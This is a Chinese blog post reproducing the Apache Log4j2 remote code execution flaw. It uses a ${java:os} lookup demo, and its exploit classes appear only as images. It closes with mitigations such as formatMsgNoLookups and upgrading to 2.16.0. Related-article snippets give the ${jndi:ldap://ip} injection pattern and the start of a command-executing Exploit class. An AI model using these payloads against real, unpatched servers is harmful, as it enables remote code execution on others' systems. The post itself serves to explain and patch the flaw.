Apache log4j漏洞复现

最新推荐文章于 2024-06-08 10:01:02 发布
最新推荐文章于 2024-06-08 10:01:02 发布
阅读量4k 收藏
点赞数
分类专栏: java 文章标签: apache java 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lizhe0327/article/details/121988742
版权

Apache Log4j2是一款优秀的Java日志框架。2021年11月24日,阿里云安全团队向Apache官方报告了Apache Log4j2远程代码执行漏洞。由于Apache Log4j2某些功能存在递归解析功能,攻击者可直接构造恶意请求

漏洞只针对的是2.15以下版本的

现在我们来重现一下log4j的漏洞

public class Log4jTest {
    private static final Logger log = LogManager.getLogger();
    public static void main(String[] args) {
            String str = "${java:os}";
            log.info("hello {} !", str);
    }
}

${}是log4j的占位符,我们可以通过占位符的方式方便我们打印日志,这段代码输出是:hello Windows 10 10.0, architecture: amd64-64 !
输出了我们当前电脑的消息,当然这样看起来没问题,但却给了别有用心之人有机可趁

下面我们来重现一下漏洞,这是一个jndi的服务类
jndiserver
下面这个类是我们可以通过此类进行一些操作
在这里插入图片描述

再写一个测试类
在这里插入图片描述

先启动RmiServer类,在启动测试类
运行结果:
在这里插入图片描述
大家可以看到他是在测试类里打印的EvilObj,而不是在RmiServer里打印的,这就非常恐怖,代表着我可以在你服务器执行我想执行的代码,所以这个漏洞是非常严重的,如果说破坏者通过前端输入然后你后台打印了用户的输入,就可以在你的服务器执行他的程序,这是一个低级且严重的问题,大家升级到2.15以上版本就行了

解决方案

a、修改jvm参数 -Dlog4j2.formatMsgNoLookups=true
b、修改配置:log4j2.formatMsgNoLookups=True
c、系统环境变量 FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS设置为true

如果springBoot里面有引用的话,在pom文件加上以下代码,这也是spring官网给出的方案

 <properties>
    <log4j2.version>2.16.0</log4j2.version>
</properties>
。哲
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Apache Log4j-漏洞复现(CVE-2021-44228)
千寻的博客
12-22 3144
文章目录漏洞描述漏洞编号影响范围FOFA环境搭建漏洞复现漏洞复现-反弹shell参考连接摘抄 漏洞描述 Apache Log4jApache 的一个开源项目,Apache Log4j2是一个基于Java的日志记录工具。 该工具重写了Log4j框架,并且引入了大量丰富的特性。 我们可以控制日志信息输送的目的地为控制台、文件、GUI组件等,通过定义每一条日志信息的级别,能够更加细致地控制日志的生成过程。 该日志框架被大量用于业务系统开发,用来记录日志信息。 Apace在其2.0到2.14.1版本中存在一
Apache log4j远程代码执行漏洞复现
qq_46162550的博客
05-11 1730
Apache log4j远程代码执行漏洞复现(1) 漏洞原理:(2) 漏洞复现环境:(3) 漏洞复现过程: (1) 漏洞原理: Apache Log4j2 中存在JNDI注入漏洞,当程序将用户输入的数据进行日志记录时,即当log4j打印的日志内容中包含${jndi:ldap://my-ip}时,lookup会将jndi注入可执行语句执行,程序会通过ldap协议访问my-ip这个地址,然后my-ip就会返回一个包含java代码的class文件的地址,然后程序再通过返回的地址下载class文件并执行,从而达成漏
探索高效日志管理之道:Apache Log4cxx 全解析
最新发布
gitblog_00004的博客
06-08 292
探索高效日志管理之道:Apache Log4cxx 全解析 项目地址:https://gitcode.com/apachelogging-log4cxx/logging-log4cxx 在当今复杂多变的软件开发环境中,日志管理和监控对于系统维护与故障排查至关重要。今天,我们将深入探讨一个重量级的开源工具——Apache Log4cxx,它为C++开发者提供了一套灵活且强大的日志框架。 1. 项目介...
Apache】 手把手教你Log4j2漏洞复现
zero;
03-29 5841
ApacheLog4j2是一个开源的Java日志框架,被广泛地应用在中间件、开发框架与Web应用中。
Log4J 漏洞复现
qq_42307546的博客
12-13 2845
介绍:log4j是一个用Java编写的可靠,快速和灵活的日志框架(API),它在Apache软件许可下发布 log4j存在远程代码执行漏洞,通过lookup来触发漏洞详情参考 https://zhuanlan.zhihu.com/p/444140910 首先我们需要编写一个恶意的类然后编译成class文件 public class Exploit { public Exploit(){ try{ // 要执行的命令 String[] comma
log4j漏洞复现
Massimo__JAVA的博客
08-03 373
Log4j是由Apache提供的日志操作包,用于帮助用户处理日志信息。通过Log4j,可以控制日志信息输送的目的地是控制台、文件、GUI组件、甚至是套接口服务器等各种地方。
Apache Log4j 2代码漏洞处置指南及检测工具.zip
12-10
Apache Log4j 2存在远程代码执行漏洞处置指南 及期检测工具
Apache Log4j2 远程代码执行漏洞检测工具
12-15
针对这个漏洞,开发出了专门的Apache Log4j2远程代码执行漏洞检测工具,这些工具包括针对Windows和Linux操作系统的版本。这些工具的主要目的是帮助管理员和安全专家迅速识别其环境中是否存在易受攻击的Log4j2实例。 ...
Apache Log4j2紧急缓解措施.docx
12-16
Apache Log4j2 是一个流行的 Java 日志记录工具,但最近出现了严重的安全漏洞Apache Log4j2 紧急缓解措施旨在帮助开发者尽快修复该漏洞,避免攻击者的攻击。 一、修改启动脚本 在启动 Java 应用程序时,添加一...
解决Apache Log4j 远程代码执行漏洞log4j2部分jar
12-10
解决Apache Log4j 远程代码执行漏洞log4j2部分jar,包含log4j-1.2-api-2.15.0.jar,log4j-api-2.15.0.jar,log4j-core-2.15.0.jar,log4j-to-slf4j-2.15.0.jar
Log4j漏洞复现
qq_41814777的博客
03-14 5484
漏洞描述 Apache Log4j2是一款Java日志框架。由于Apache Log4j2某些功能存在递归解析功能,攻击者可直接构造恶意请求,触发远程代码执行漏洞。在打印日志的时候,如果你的日志内容中包含关键词 ${},攻击者就能将关键字所包含的内容当作变量来替换成任何攻击命令,并且执行 Log4j-2中存在JNDI注入漏洞,当程序将用户输入的数据日志记录时,即可触发此漏洞,成功利用此漏洞可以在目标服务器上执行任意代码。当log4j打印的日志内容中包括 ${jndi:ldap://ip}时,程序就会通过Id
网络安全 log4j漏洞复现
jazzz98的博客
06-19 3742
log4j被爆出“史诗级”漏洞。其危害非常大,影响非常广。该漏洞非常容易利用,可以执行任意代码。这个漏洞的影响可谓是重量级的。
apache log4j2 漏洞复现
06-28
Apache Log4j2漏洞是一种远程代码执行漏洞,攻击者可以利用该漏洞在受影响的服务器上执行任意代码。攻击者可以通过构造特定的请求,将恶意代码注入到受影响的服务器上,从而实现远程代码执行。该漏洞已被广泛利用,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值